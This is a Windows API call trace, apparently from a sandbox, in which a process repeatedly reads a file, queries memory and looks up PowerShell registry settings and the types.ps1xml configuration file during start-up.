	[0143.236] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.236] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.237] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.237] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.237] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.237] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.238] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.238] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.238] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.238] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.239] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.239] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.239] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.239] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.240] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.243] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.243] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.243] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.245] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.245] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1b4, lpOverlapped=0x0) returned 1
	[0143.245] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x0, lpOverlapped=0x0) returned 1
	[0143.245] CloseHandle (hObject=0x34c) returned 1
	[0143.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0143.246] SetErrorMode (uMode=0x1) returned 0x1
	[0143.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd000 | out: lpFileInformation=0x1cd000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0143.246] SetErrorMode (uMode=0x1) returned 0x1
	[0143.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0143.246] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x34c) returned 0x0
	[0143.246] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd06c, lpData=0x0, lpcbData=0x1cd068*=0x0 | out: lpType=0x1cd06c*=0x1, lpData=0x0, lpcbData=0x1cd068*=0x56) returned 0x0
	[0143.246] CoTaskMemAlloc (cb=0x5a) returned 0x34c8a0
	[0143.246] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd03c, lpData=0x34c8a0, lpcbData=0x1cd038*=0x56 | out: lpType=0x1cd03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd038*=0x56) returned 0x0
	[0143.246] CoTaskMemFree (pv=0x34c8a0) 
	[0143.246] RegCloseKey (hKey=0x34c) returned 0x0
	[0143.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0143.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0143.671] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.684] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.685] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.686] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.686] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.686] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.687] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.688] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.722] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.723] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.818] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.819] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.820] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.821] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.824] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.824] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.834] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.842] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.842] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.843] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.843] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.844] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.844] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.844] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.844] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.845] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.846] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.846] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.846] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.846] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.849] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.852] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.852] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.852] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.853] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.974] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.975] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.976] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.987] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0143.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0143.987] CoTaskMemFree (pv=0x1b7da8b0) 
	[0143.994] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.003] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.004] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.099] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.100] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.103] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.103] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.106] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.107] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.108] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd288 | out: phkResult=0x1cd288*=0x320) returned 0x0
	[0144.108] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd29c, lpData=0x0, lpcbData=0x1cd298*=0x0 | out: lpType=0x1cd29c*=0x1, lpData=0x0, lpcbData=0x1cd298*=0x74) returned 0x0
	[0144.108] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd20c, lpData=0x0, lpcbData=0x1cd208*=0x0 | out: lpType=0x1cd20c*=0x1, lpData=0x0, lpcbData=0x1cd208*=0x74) returned 0x0
	[0144.108] CoTaskMemAlloc (cb=0x78) returned 0x380e20
	[0144.108] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd1dc, lpData=0x380e20, lpcbData=0x1cd1d8*=0x74 | out: lpType=0x1cd1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd1d8*=0x74) returned 0x0
	[0144.109] CoTaskMemFree (pv=0x380e20) 
	[0144.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0144.109] SetErrorMode (uMode=0x1) returned 0x1
	[0144.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
